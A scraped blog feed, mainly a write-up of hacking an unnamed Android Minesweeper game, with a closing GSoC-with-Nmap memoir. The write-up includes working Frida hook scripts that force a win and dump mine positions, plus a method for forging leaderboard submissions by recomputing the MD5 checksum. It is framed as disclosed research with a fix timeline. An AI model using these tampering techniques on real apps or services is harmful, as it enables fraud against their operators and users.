<p>If an attacker is able to create a mutating webhook admission controller, they gain the ability to perform privileged operations, and that can be disastrous. Admission controllers are highly effective for validating resources as they are created, hardening deployments, etc. A simple RBAC policy following least privilege could have prevented this massive attack.</p>
<h3 id="heading-references">References</h3>
<ul>
<li><a target="_blank" href="https://github.com/rewanthtammana/malicious-admission-controller-webhook-demo">Code: Malicious admission controller</a></li>
<li><a target="_blank" href="https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/">Kubernetes Docs</a></li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Minesweeper Hacked: How We Hacked An Android Game And Ranked First Globally]]></title><description><![CDATA[Minesweeper Hacked: How we hacked an Android game to top the global leaderboard without even playing the game.
Recently, we came across an Android game of Minesweeper. The game has been nicely developed and was fun to play. Although it was very tough...]]></description><link>https://blog.rewanthtammana.com/minesweeper-hacked-how-we-hacked-an-android-game-and-ranked-first-globally</link><guid isPermaLink="true">https://blog.rewanthtammana.com/minesweeper-hacked-how-we-hacked-an-android-game-and-ranked-first-globally</guid><category><![CDATA[Security]]></category><category><![CDATA[Android]]></category><category><![CDATA[Applications]]></category><category><![CDATA[hacking]]></category><category><![CDATA[Game Development]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Fri, 28 May 2021 10:06:45 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1622196397330/Vo-3D__Om.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h3 id="heading-minesweeper-hacked-how-we-hacked-an-android-game-to-top-the-global-leaderboard-without-even-playing-the-game"><strong>Minesweeper Hacked: How we hacked an Android game to top the global leaderboard without even playing the game.</strong></h3>
<p>Recently, we came across an Android Minesweeper game. The game has been nicely developed and was fun to play, although it was very tough to win and even tougher to reach the top ranks on the leaderboard. That’s when it struck us: why not “play” with the game some other way and figure out how to hack Minesweeper? So we started analyzing the game.</p>
<p><strong>What is Minesweeper game</strong></p>
<blockquote>
<p>Minesweeper has a very basic gameplay style. In its original form, mines are scattered throughout a board. This board is divided into cells, which have three states: uncovered, covered and flagged. A covered cell is blank and clickable, while an uncovered cell is exposed, either containing a number (the mines adjacent to it), or a mine. When a cell is uncovered by a player click, and if it bears a mine, the game ends. A flagged cell is similar to a covered one, in the way that mines are not triggered when a cell is flagged, and it is impossible to lose through the action of flagging a cell. However, flagging a cell implies that a player thinks there is a mine underneath, which causes the game to deduct an available mine from the display.</p>
<p>In order to win the game, players must logically deduce where mines exist through the use of the numbers given by uncovered cells. To win, all non-mine cells must be uncovered and all mine cells must be flagged. At this stage, the timer is stopped.</p>
<p>When a player left-clicks on a cell, the game will uncover it. If there are no mines adjacent to that particular cell, the mine will display a blank tile or a “0”, and all adjacent cells will automatically be uncovered. Right-clicking on a cell will flag it, causing a flag to appear on it. Note that flagged cells are still covered, and a player can click on it to uncover it, like a normal covered cell.</p>
</blockquote>
<p>Source:  <a target="_blank" href="https://en.wikipedia.org/wiki/Minesweeper_%28video_game%29">Wikipedia</a></p>
<hr /> 

<h3 id="heading-minesweeper-hacked-introduction"><strong>Minesweeper Hacked: Introduction</strong></h3>
<p>Initially, our goal was to win the game irrespective of the time required. During the analysis we found that it was possible to reverse engineer the application and change values of some of the functions and win the game. We were able to achieve this task using two different methods.</p>
<p>Our next goal was to top the global leaderboards of all the difficulty levels, i.e. Beginner, Easy, Intermediate and Expert. In order to do that, we started analysing the application dynamically and inspected the network traffic between the application and the server it was communicating with. We analysed the source code of the APK further and tampered with the requests accordingly to top the global rankings for every difficulty level.</p>
<blockquote>
<p>Note: The name of the game has been redacted on purpose. The game has 1M+ downloads on play store.</p>
</blockquote>
<h3 id="heading-how-we-did-it">How we did it</h3>
<p>Find the package name of the installed application and decompile it</p>
<p>There are multiple ways to achieve this, whether with ADB or from the Play Store URL <code>https://play.google.com/store/apps/details?id=&lt;app package name&gt;</code></p>
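<p>If the package name isn't known yet, it can also be listed straight from the device; a minimal sketch, where the grep keyword is a placeholder:</p>
<pre><code class="lang-bash">adb shell pm list packages | grep -i &lt;keyword&gt;
</code></pre>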
<ol>
<li><p>To extract the APK from the device, we used the <strong>adb</strong> tool.</p>
<p> Connect the device to the computer and make sure debugging is enabled. Start adb server and pull the apk using the following command.</p>
<pre><code class="lang-bash"> adb pull $(adb shell pm path &lt;app package name&gt; | cut -d<span class="hljs-string">':'</span> -f2)
 mv base.apk game.apk
</code></pre>
</li>
<li><p>To decompile the application, we will use apkx tool.</p>
<p> <strong>apkx </strong> is a Python wrapper to popular free dex converters and Java decompilers. Extracts Java source code directly from the APK. Useful for experimenting with different converters/decompilers without having to worry about classpath settings and command line args.</p>
<pre><code class="lang-bash"> apkx game.apk
</code></pre>
</li>
</ol>
<p>Reference: Download apkx  <a target="_blank" href="https://github.com/b-mueller/apkx">here</a> </p>
<hr />

<p><strong>Different methods we hacked the application</strong></p>
<ul>
<li><strong>METHOD 1</strong>: Hook the application at run-time and toggle the value passed to the GameActivity.finishgame function.</li>
<li><strong>METHOD 2</strong>: Hook the application at run-time and print the game board from the game.GameBoard class.</li>
<li><strong>METHOD 3</strong>: Hack the application by sending a success message to the server with a tampered completion time and checksum.</li>
</ul>
<blockquote>
<p>Observation is the key to hacking these kinds of applications</p>
</blockquote>
<hr />

<h3 id="heading-tools-used">TOOLS USED</h3>
<p><strong>Method 1 &amp; 2:</strong> Frida</p>
<p><strong>Method 3:</strong> BurpSuite or Curl (command line utility on Linux OS)</p>
<hr />

<h3 id="heading-method-1">METHOD 1</h3>
<p>Observe what actions are performed when you click on a bomb. The following observations are helpful</p>
<ol>
<li>Game ends</li>
<li>Timer is stopped</li>
</ol>
<p>We look for functions that trigger these operations.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1622194998777/muabd6ofE.png" alt="Minesweeper-finish-game-snippet-hide.png" /></p>
<p><code>finishgame</code> function expects a boolean argument. Print the boolean argument to see what is passed into the function.</p>
<pre><code class="lang-javascript"><span class="hljs-built_in">setTimeout</span>(<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params"></span>) </span>{
    Java.perform(<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params"></span>) </span>{

        <span class="hljs-keyword">var</span> GameActivity = Java.use(<span class="hljs-string">"&lt;app package name&gt;.GameActivity"</span>);

        GameActivity.finishgame.implementation = <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">bl2</span>) </span>{
            <span class="hljs-built_in">console</span>.log(<span class="hljs-string">"&gt;&gt;&gt;&gt;&gt; Hacking minesweeper game: finsihgame return value = "</span>, bl2);
            <span class="hljs-built_in">this</span>.finishgame(bl2);
        }
    })
}, <span class="hljs-number">10</span>);
</code></pre>
<p>The below command spawns a new process</p>
<pre><code class="lang-bash">frida -f &lt;app package name&gt; -U -l hook.js --no-pause
</code></pre>
<p>Now, observe what happens when a mine is clicked. A <code>false</code> value is passed to the <code>finishgame</code> function.</p>
<p>Maybe that’s how it knows we lost the game. Instead, we will toggle the value of <code>bl2</code> passed to the <code>finishgame</code> function.</p>
<pre><code class="lang-javascript"><span class="hljs-built_in">setTimeout</span>(<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params"></span>) </span>{
    Java.perform(<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params"></span>) </span>{

        <span class="hljs-keyword">var</span> GameActivity = Java.use(<span class="hljs-string">"&lt;app package name&gt;.GameActivity"</span>);

        GameActivity.finishgame.implementation = <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">bl2</span>) </span>{
            <span class="hljs-built_in">console</span>.log(<span class="hljs-string">"&gt;&gt;&gt;&gt;&gt; Hacking minesweeper game: finish game value = "</span>, bl2);
            <span class="hljs-built_in">this</span>.finishgame(<span class="hljs-literal">true</span>);
        }
    })
}, <span class="hljs-number">10</span>);
</code></pre>
<p>Execute the following command to start the application and hook Frida script</p>
<pre><code class="lang-bash">frida -f &lt;app package name&gt; -U -l hook.js --no-pause
</code></pre>
<p>Now, when we click on a bomb, we win the game instead of losing it.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1622195238527/AArTC-cvB.png" alt="POC-minesweeper-frida-01-hide.png" /></p>
<h3 id="heading-method-2">METHOD 2</h3>
<p>In the first method, we hooked the function that sends the message to finish game.</p>
<p>Now, we want to see where the bombs are located. Going through the decompiled Java files, we look for the function that places the bombs on the board.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1622195275755/XevyFg06B.png" alt="Minesweeper-generate-game-board-hide.png" /></p>
<p>Open the app, start a new game and hook the JS script below to the existing process.</p>
<pre><code class="lang-javascript"><span class="hljs-keyword">var</span> game_board_instance;
<span class="hljs-built_in">console</span>.log(<span class="hljs-string">"&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; Init frida script"</span>);

<span class="hljs-built_in">setTimeout</span>(<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params"></span>) </span>{
    Java.perform(<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params"></span>) </span>{

        <span class="hljs-built_in">console</span>.log(<span class="hljs-string">"&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; Init Java perform module"</span>);

        Java.choose(<span class="hljs-string">"&lt;app package name&gt;.states.game.GameBoard"</span>, {
            <span class="hljs-string">"onMatch"</span>: <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">instance</span>) </span>{
                game_board_instance = instance;
                <span class="hljs-built_in">console</span>.log(<span class="hljs-string">"Captured game board instance"</span>);
            },
            <span class="hljs-string">"onComplete"</span>: <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params"></span>) </span>{}
        });

        <span class="hljs-built_in">console</span>.log(<span class="hljs-string">"Height: "</span>, game_board_instance.height.value);
        <span class="hljs-built_in">console</span>.log(<span class="hljs-string">"Width: "</span>, game_board_instance.width.value);

        <span class="hljs-built_in">console</span>.log(<span class="hljs-string">"Extracting the game board sequence &gt;&gt;&gt;&gt;&gt;&gt;"</span>);

        <span class="hljs-keyword">for</span>(<span class="hljs-keyword">var</span> i=<span class="hljs-number">0</span>; i&lt;game_board_instance.height.value; i++) {
            <span class="hljs-keyword">var</span> horizontal_sequence = <span class="hljs-string">""</span>;
            <span class="hljs-keyword">for</span>(<span class="hljs-keyword">var</span> j=<span class="hljs-number">0</span>; j&lt;game_board_instance.width.value; j++) {
                horizontal_sequence = horizontal_sequence + <span class="hljs-string">" "</span> + game_board_instance.tiles.value[i][j];
            }
            <span class="hljs-built_in">console</span>.log(horizontal_sequence);
        }

    })
}, <span class="hljs-number">10</span>);
</code></pre>
<p>Run the following command to attach our Frida script to the running app</p>
<pre><code class="lang-bash">frida -U &lt;app package name&gt; -l hook.js --no-pause
</code></pre>
<p>We can see that the entire board is printed along with the tile values. The value 9 is a bomb!</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1622195378627/6DvNqzldK.png" alt="POC-minesweeper-frida-02-hide.png" /></p>
<h3 id="heading-method-3">METHOD 3</h3>
<p>After we finish the game, the application provides us with a global rank. The requests it makes to the server can be intercepted with a proxy tool like BurpSuite.</p>
<p>Reference:  <a target="_blank" href="https://portswigger.net/support/configuring-an-android-device-to-work-with-burp">https://portswigger.net/support/configuring-an-android-device-to-work-with-burp</a> </p>
<blockquote>
<p>Note: The application had implemented SSL Pinning, which we were able to bypass using Objection. Since this is a blog showing how we hacked the app, we decided not to show how to bypass SSL pinning using Objection or Frida. We will write a new blog with step by step instructions on how to use Frida and Objection.</p>
</blockquote>
<p>Upon intercepting the request, we realised the <code>simpleDbTime</code> parameter contains the time we took to finish the game. If we could intercept this request and send a fake <code>simpleDbTime</code> to the server, we would win. But it’s not that easy. When we did that, the result wasn’t persistent; our scores weren’t reflected on the global scoreboard. We realised there is a checksum that validates the request.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1622195453486/3yezar0s5.png" alt="POC-minesweeper-burp-03-hide.png" /></p>
<p>We analyzed the code further and found the part corresponding to the checksum.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1622195485376/P-tuJ_1UL.png" alt="POC-checksum-code.png" /></p>
<p>We can see the implementation of the checksum algorithm. Parameters like <code>itemName</code>, <code>deviceId</code> and <code>simpleDbTime</code> are joined with dots to calculate the <code>md5sum</code> for the request.</p>
<p>We computed the checksum locally for our new <code>simpleDbTime</code> value using the same logic as in the application code above.</p>
<p>Let’s get MD5 checksum of the required parameters</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1622195536368/OCqzAtRLm.png" alt="POC-minesweeper-get-md5sum.png" /></p>
<p>We will now send the request using Burp with the tampered parameter values.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1622195556504/0HCefaO-h.png" alt="POC-minesweeper-burp-01-hide.png" /></p>
<p>Send another request to check the leaderboard scores. We can see that we are ranked 1st on the leaderboard.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1622195575415/9dsg-3OfW.png" alt="POC-minesweeper-burp-02-hide.png" /></p>
<p>Upon submitting this request, we can see that our data was successfully registered in the database and we can see it in the global highscores list as well.</p>
<h3 id="heading-result">RESULT</h3>
<p>Expert level challenge solved in 0.01 seconds without even playing the game!</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1622195615457/AOfzut3Yd.png" alt="POC-expert-level-global-rank-edit.png" /></p>
<p>These bugs are fixed in the latest version of the application.</p>
<hr />

<h3 id="heading-researchers">RESEARCHERS</h3>
<ul>
<li><a target="_blank" href="https://www.linkedin.com/in/rewanthcool/">Rewanth Tammana</a> </li>
<li><a target="_blank" href="https://www.linkedin.com/in/hrushikeshkakade/">Hrushikesh Kakade</a> </li>
</ul>
<h3 id="heading-timelilne">TIMELILNE</h3>
<div class="hn-table">
<table>
<thead>
<tr>
<td><strong>Status</strong></td><td><strong>Date</strong></td></tr>
</thead>
<tbody>
<tr>
<td>Bug Submitted</td><td>19 February 2020</td></tr>
<tr>
<td>Bug Triaged</td><td>25 February 2020</td></tr>
<tr>
<td>Bug Resolved</td><td>13 March 2020</td></tr>
</tbody>
</table>
</div>]]></content:encoded></item><item><title><![CDATA[GSOC 2017 with Nmap Security Scanner]]></title><description><![CDATA[GSOC 2017 with Nmap Security Scanner
Before we go any further, I thank each and every one who helped me in my way to achieving this. But for this document, I would like to limit them to my mentors Daniel Miller and Fyodor from Nmap for choosing me ov...]]></description><link>https://blog.rewanthtammana.com/gsoc-2017-with-nmap-security-scanner-1</link><guid isPermaLink="true">https://blog.rewanthtammana.com/gsoc-2017-with-nmap-security-scanner-1</guid><category><![CDATA[Open Source]]></category><category><![CDATA[network]]></category><category><![CDATA[gsoc]]></category><category><![CDATA[hacking]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Sun, 23 May 2021 13:27:02 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1621777087980/Zkg3TKJ9W.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h1 id="heading-gsoc-2017-with-nmap-security-scanner">GSOC 2017 with Nmap Security Scanner</h1>
<p>Before we go any further, I thank each and every one who helped me on my way to achieving this. But for this document, I would like to limit my thanks to my mentors <a target="_blank" href="https://twitter.com/bonsaiviking">Daniel Miller</a> and <a target="_blank" href="http://insecure.org/fyodor//">Fyodor</a> from Nmap for choosing me over several other applicants from all over the globe, for guiding me through the whole process, for providing me invaluable resources in times of need, and for being so supportive throughout my internship.</p>
<p>This article is divided into the following sub-sections.</p>
<ol>
<li><p><a class="post-section-overview" href="#fe2e">Hitting it off with Nmap.</a></p>
</li>
<li><p><a class="post-section-overview" href="#b257">Application period coding.</a></p>
</li>
<li><p><a class="post-section-overview" href="#1a2f">Official coding starts.</a></p>
</li>
<li><p><a class="post-section-overview" href="#4846">My GSOC codebase.</a>(Open this to directly access my contributions list)</p>
</li>
<li><p><a class="post-section-overview" href="#6f9b">Things I learned through GSOC.</a></p>
</li>
</ol>
<h1 id="heading-hitting-it-off-with-nmap">Hitting it off with Nmap</h1>
<p>It was in March 2017 that one of my seniors told me about <a target="_blank" href="https://summerofcode.withgoogle.com/">Google Summer of Code</a>. I’m a penetration tester and security enthusiast (web application security), so without any delay, I started going through the list of organizations that work on security. There were only 6 such organizations, and 5 of them caught my interest: Metasploit, Nmap, Tor, Honeypot, and Radare2. I thought of applying to at least 3 of them and started researching each of them. After a day or two, my inner soul started saying, “You have been using Nmap for the past 2 years, and it's now time for you to pay tribute to Nmap.” Without a second thought, I made up my mind to contribute to Nmap, leaving all the other options behind.</p>
<h1 id="heading-application-period-coding">Application period coding</h1>
<p>I realized that I was far behind my peers in terms of knowledge of the Nmap codebase and other things related to Nmap. Initially, I was a bit worried when I went over to the IRC channel (#Nmap) and found that many of them had started their GSOC preparation in Dec ’16, while I started just 10–15 days before the deadline. Nmap has its own scripting engine, NSE (Nmap Scripting Engine), and its scripts are written in Lua. I had never heard of this language before, and on top of that I was left with very few days. Still, I didn’t lose hope, and since I’m a quick learner I picked up the language quickly. But quickly going through a couple of tutorial websites doesn’t mean you are good with a language. So, to convince myself that I was good at Lua, I developed a small project in Lua within a day: it automatically converts your Mozilla browser into a hacker toolkit by installing all the required add-ons.</p>
<p>Once I was familiar with Lua, I started to read the Nmap codebase. Nmap isn’t a single tool by itself; it ships with several other tools like Ncat, Nping, Ndiff, and Zenmap, and one can contribute to any of these 5 tools through GSOC.</p>
<p>The Nmap developers on the IRC channel were very helpful. Once I felt comfortable with the codebase, I checked the issues page, picked an issue that matched my interest, and made my first PR. Later on, I felt that going only through the GitHub issue tracker would not help me write great scripts. Since I’m familiar with Nmap usage, I knew the pros and cons of the available scripts, and while pentesting during my internship I needed a few scripts that were missing from Nmap. I felt that implementing them would help other hackers during their pentests. This is how I started to contribute to Nmap.</p>
<p>A few of my PRs were merged into Nmap very quickly. Yayyy…. I felt very happy inside since I had made Nmap better. This increased my respect for Open Source and Nmap.</p>
<p>I started being active on the IRC channels and making PRs on GitHub. I submitted my GSOC application two minutes before the deadline. Ufff….. it felt like I was re-born, because Google doesn’t extend the deadline at any cost.</p>
<p>The results took about a month to come out; in the meanwhile, I got completely familiar with Nmap and kept contributing. In that one month, I received invaluable help from the open-source community and the Nmap developers, which improved my coding abilities and my familiarity with the Nmap codebase.</p>
<p>To be frank, I forgot that I had applied for GSOC; I was so immersed in contributing to Nmap, and I felt proud that I was able to help other hackers by improving the Nmap source code. Then, while I was submerged in contributing, I got a call from my senior at around 23:00 on May 4 saying I had been selected for Nmap. Hurrah…..!! I was on cloud nine since I got the chance to work with Nmap through Google.</p>
<h1 id="heading-official-coding-starts">Official coding starts</h1>
<p><img src="https://miro.medium.com/max/4096/1*_dfhyjJY7Wk_z3dY4IsTqw.jpeg" alt /></p>
<p>That’s me above, struggling with decoding SMB responses (binary data).</p>
<p>I got active on GSOC’17 WhatsApp groups, Facebook groups, Telegram channels, Slack channels, IRCs, and so on. I got a chance to meet the best talent from all over the world, and I now have connections all over the globe.</p>
<p>I got some resources from my mentor which I had to go through before I started actual coding. Since I was anxious to get going, I took the chance, without asking my mentor’s permission, to work on the ideas I had submitted in my GSOC proposal, which I later found was one of the biggest mistakes I made. Read the next two sections to know why.</p>
<h2 id="heading-dollar-autocomplete-feature-for-nmap">$ autocomplete feature for Nmap</h2>
<p>Previously, developers had to type commands out completely to run their scripts. There are hundreds of scripts, and each script has tens of arguments that no one can ever master, so every hacker had to check the script file or the documentation just to use Nmap. I felt it would be cool if we could provide a feature that autocompletes the arguments upon double-tapping [TAB]. I noticed that my mentor had a private repo that provided this functionality, but it failed to autocomplete the inner arguments that a script expects the user to provide. I thought adding that feature would be cool, and I started coding it right away without his permission.</p>
<p>I made a PR <a target="_blank" href="https://github.com/bonsaiviking/nmap-completion/pull/4/files">#4</a> which closed issue <a target="_blank" href="https://github.com/bonsaiviking/nmap-completion/issues/1">#1</a> as well in the private repo.</p>
<h2 id="heading-dollar-colored-output-for-nmap">$ colored output for Nmap</h2>
<p><img src="https://miro.medium.com/max/3840/1*0voV-Nz4ApHzkhv-I5YC6g.png" alt /></p>
<p><img src="https://miro.medium.com/max/3840/1*6bS3ChsM7JbRa2U2vVpsQg.png" alt /></p>
<p>Screenshots of colored output for easy debugging purposes.</p>
<p>There are several options in Nmap for debugging purposes, but the debugging messages can’t be easily identified by an n00b. Enabling this feature increases readability by making it easier to examine the detailed output along with the debugging info.</p>
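<p>Nmap’s output layer is written in C, but the general trick is easy to show. Below is a minimal Lua sketch (not the actual patch) of severity-based coloring: each line is wrapped in an ANSI escape sequence chosen by its level, so debug noise and real findings stand apart on any terminal that understands ANSI colors.</p>
<pre><code class="lang-lua">-- Minimal sketch of severity-based coloring with ANSI escapes.
-- "\27" is the ESC character; this only works on ANSI-capable terminals.
local colors = {
  debug = "\27[90m",   -- grey
  warn  = "\27[33m",   -- yellow
  error = "\27[31m",   -- red
}
local reset = "\27[0m"

local function cprint(level, message)
  io.write(colors[level] or "", message, reset, "\n")
end

cprint("debug", "Raw packets sent: 1000 | Rcvd: 998")
cprint("error", "Failed to resolve given hostname/IP")
</code></pre>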
<p>I was very happy, thinking that both of the above PRs would be merged into the Nmap master branch. Sadly, both of them were turned down by my mentor: the autocomplete feature and the colored output only work well on Linux (bash) and might fail on other shells like zsh, ksh, and so on. Most importantly, neither feature would work on Windows due to lack of support. I felt bad that I hadn’t discussed implementing these ideas with my mentor beforehand. So these PRs were rejected from being merged into the master branch, but they can be maintained in a private repo, which I’m planning to release soon.</p>
<p>Until now I had been trying to make enhancements that would help an n00b hacker, but then I felt like making something useful for everyone.</p>
<h2 id="heading-dollar-refactoring-http-enum-script">$ refactoring http-enum script</h2>
<p>The http-enum script is structured in a very old-fashioned way. I had discussions with my mentor for more than 2 weeks about the changes to be made, and I created a report explaining the shortcomings, new features, and improvements that could be made to optimize the script.</p>
<blockquote>
<p>Report is available on Google docs,</p>
<p><a target="_blank" href="https://goo.gl/ubkV2E">https://goo.gl/ubkV2E</a></p>
</blockquote>
<p>Since we were hit with some other important tasks and the issues on the tracker were piling up rapidly, we decided to continue this enhancement later on.</p>
<h2 id="heading-dollar-added-missing-ip-protocols-to-netutilcc">$ added missing ip protocols to netutil.cc</h2>
<p>Some important IP protocols were missing from the list in netutil.cc, which is widely used. I added the important, missing protocols to the existing file. Nmap already has a mapping of protocol numbers to names based on <a target="_blank" href="https://www.iana.org/assignments/protocol-numbers/protocol-numbers.xhtml#protocol-numbers-1">IANA’s assignment registry</a>, namely the <em>nmap-protocols</em> file.</p>
<p>I merged the proto2ascii_case and nexthdrtoa functions, which return a protocol name, and removed the proto2ascii_lowercase function by writing more modular code for one of the existing functions.</p>
<p>I wrote a shell script to generate the code from the nmap-protocols file. This will be more efficient than reading and parsing the file at run time and will also make libnetutil not dependent on an external file at run time. This is important for things like Ncat and Nping that are not usually packaged with the nmap-protocols file.</p>
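<p>The generator I actually wrote is a shell script, but the idea fits in a few lines. Here is a rough Lua sketch of it, assuming nmap-protocols follows the usual /etc/protocols layout (protocol name, number, aliases, optional # comment); it prints C initializer lines that could be pasted into a static lookup table.</p>
<pre><code class="lang-lua">-- Rough sketch of the generator idea (the real one is a shell script).
-- Assumes lines like: "tcp    6    TCP    # transmission control protocol"
local function generate(path)
  for line in io.lines(path) do
    line = line:gsub("#.*$", "")                    -- drop trailing comments
    local name, number = line:match("^(%S+)%s+(%d+)")
    if name and number then
      print(string.format('  { %s, "%s" },', number, name))
    end
  end
end

generate(arg[1] or "nmap-protocols")
</code></pre>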
<h2 id="heading-dollar-fixed-issues-related-to-cve-20143704-nse-script">$ fixed issues related to cve-2014–3704 nse script</h2>
<p>There was issue #902, related to the malfunctioning of the cve-2014-3704 script: when the script was executed against a vulnerable server, it produced a false result. It was a very tricky issue. I tried exploiting the vulnerable server using Metasploit and it was successful, but when I tried to exploit it using the Nmap script it failed, even though the code of the two scripts looked the same.</p>
<p>I thought there might be an issue with the way the packets for the POST request were sent by Nmap, so I intercepted the packets of both Metasploit and Nmap with Wireshark while exploiting the server. I observed that the Nmap packets were crafted in a different format than Metasploit’s. I tried very hard for one complete week to figure out why the POST data sent by the two tools differed. After a week, a hacker on the Metasploit IRC channel answered my question, and I resolved the issue with the way the request was sent.</p>
<p>Later on, I found that Drupal has two login pages and only one of them is vulnerable; the two URLs differ by just a single character, and I felt bad that I hadn’t observed that in the first place. I changed the endpoint of the target server in the Nmap script and everything fell into place.</p>
<h2 id="heading-dollar-enhancement-made-to-cve-20143704-nse-script">$ enhancement made to cve-2014–3704 nse script</h2>
<p>After attacking the server, we have to check for traces of compromise, but the existing Nmap script did not do this properly. I won’t say it was entirely wrong, but it didn’t work in all cases. For example, if the vulnerable website is in Spanish or French, the existing script cannot report the vulnerability correctly. I added new conditions that check for multiple traces of compromise before confirming the vulnerability, as sketched below.</p>
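<p>The sketch below only illustrates the shape of that change; the indicator patterns are hypothetical placeholders, not the ones the real script matches. The point is simply that requiring several independent, language-neutral traces avoids false results when the site’s UI is in Spanish, French, or anything else.</p>
<pre><code class="lang-lua">-- Illustration only: confirm compromise from several independent traces
-- instead of one English status string. Patterns here are hypothetical.
local indicators = {
  "attacker%-created%-account",   -- hypothetical trace 1
  "form_build_id",                -- hypothetical trace 2
  "user/%d+/edit",                -- hypothetical trace 3
}

local function looks_compromised(body)
  local hits = 0
  for _, pattern in ipairs(indicators) do
    if body:find(pattern) then
      hits = hits + 1
    end
  end
  return hits &gt;= 2   -- demand at least two traces before reporting
end
</code></pre>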
<h2 id="heading-dollar-wrote-script-for-openwebnet-protocol-discovery">$ wrote script for OpenWebNet protocol discovery</h2>
<p>The OpenWebNet protocol is a communications protocol developed by BTicino since 2000, used mainly for home automation. It is widely used, yet good documentation on it is scarce; only two websites exist that helped me in writing this script.</p>
<p>This new script can fetch information like the IP address, netmask, MAC address, device type, firmware version, server uptime, date and time, kernel version, and distribution version from the target. Apart from that, it can retrieve the number of automated devices, lights, burglar alarms, heating devices, and so on.</p>
<p>So it is a very useful script when enumerating home-automation appliances, as it is capable of fetching so many details from the target.</p>
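<p>To give a feel for why the enumeration is so rich, here is a tiny standalone Lua sketch of the frame handling (the published script uses the NSE socket API instead). The WHO and dimension values shown (13 for device info, 16 for firmware version) and the frame layout are from my reading of the scarce docs, so treat them as assumptions.</p>
<pre><code class="lang-lua">-- Sketch of OpenWebNet framing. Assumed layout:
--   request: *#WHO**DIMENSION##      reply: *#WHO**DIMENSION*v1*v2*...##
local WHO_DEVICE   = "13"   -- device-information family (assumed)
local DIM_FIRMWARE = "16"   -- firmware version dimension (assumed)

local function build_request(who, dimension)
  return "*#" .. who .. "**" .. dimension .. "##"
end

local function parse_reply(frame)
  local values = {}
  -- capture everything between the dimension field and the trailing ##
  local payload = frame:match("^%*#%d+%*%*%d+%*(.-)##$")
  if payload then
    for field in payload:gmatch("[^%*]+") do
      values[#values + 1] = field
    end
  end
  return values
end

print(build_request(WHO_DEVICE, DIM_FIRMWARE))   -- prints *#13**16##
local v = parse_reply("*#13**16*3*0*1##")        -- sample reply
print(table.concat(v, "."))                      -- prints 3.0.1
</code></pre>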
<h2 id="heading-dollar-removed-redundant-parsing-functions-by-making-enhancements">$ removed redundant parsing functions by making enhancements</h2>
<p>Previously, two functions from two different libraries were used for parsing websites. Each function had some extra functionality with respect to the other, but they shared code to some extent. I combined them into one function; this particular commit is a good cleanup of redundant code.</p>
<h2 id="heading-dollar-developed-punycode-and-idna-libraries-for-nmap">$ developed punycode and idna libraries for nmap</h2>
<p>The existing Nmap crawler can send requests only to ASCII (English) domain names.</p>
<p>If you try to crawl websites like “http://點看.com” or “http://योगा.भारत”, you get an error saying the URL cannot be decoded.</p>
<p>I created Punycode and IDNA libraries with functions that let you encode and decode this kind of stuff. For example,</p>
<p>“http://點看.com” gets encoded into “http://xn--c1yn36f.com”.</p>
<p>“http://योगा.भारत” gets encoded into “<a target="_blank" href="http://xn--31b1c3b9b.xn--h2brj9c">http://xn--31b1c3b9b.xn--h2brj9c</a>”.</p>
<p>Crawlers can now crawl these websites by using the encoded URLs.</p>
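<p>As a rough illustration of what the idna library does, the sketch below walks a hostname label by label and rewrites only the non-ASCII ones, assuming a punycode_encode helper (a hypothetical stand-in for the RFC 3492 encoder, passed in as a parameter). The real library also performs the Nameprep/UTS #46 mapping steps that this sketch skips.</p>
<pre><code class="lang-lua">-- Simplified ToASCII flow: only non-ASCII labels get the "xn--" prefix.
-- punycode_encode is a hypothetical stand-in for the RFC 3492 encoder.
local function is_ascii(label)
  return label:find("[\128-\255]") == nil
end

local function to_ascii(host, punycode_encode)
  local out = {}
  for label in host:gmatch("[^%.]+") do
    if is_ascii(label) then
      out[#out + 1] = label
    else
      out[#out + 1] = "xn--" .. punycode_encode(label)
    end
  end
  return table.concat(out, ".")
end

-- Usage sketch: to_ascii("點看.com", punycode_encode) yields "xn--c1yn36f.com".
</code></pre>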
<p>Developing these libraries was a very challenging part. I never had the habit of reading technical papers from the first line to the last, but I had to read these papers thoroughly to write proper functions.</p>
<blockquote>
<p>Completing this task required high dedication because I had to read papers like UTS #46, RFC 3490, RFC 3491, RFC 3492, RFC 3493, TR #46, and TR #9, analyze the data provided in all of those technical papers, and then create the respective functions.</p>
</blockquote>
<p>Here comes the real part: I coded everything exactly as the technical standards described, and the code still didn’t work as expected. All cases were successful except one or two, and then came the highest level of depression. I didn’t have the nerve to hunt for the bug across 1500 lines of code, so I went through the research papers again and cross-checked the code against the procedures described in them. Finally, after so much struggle, I successfully developed the libraries.</p>
<blockquote>
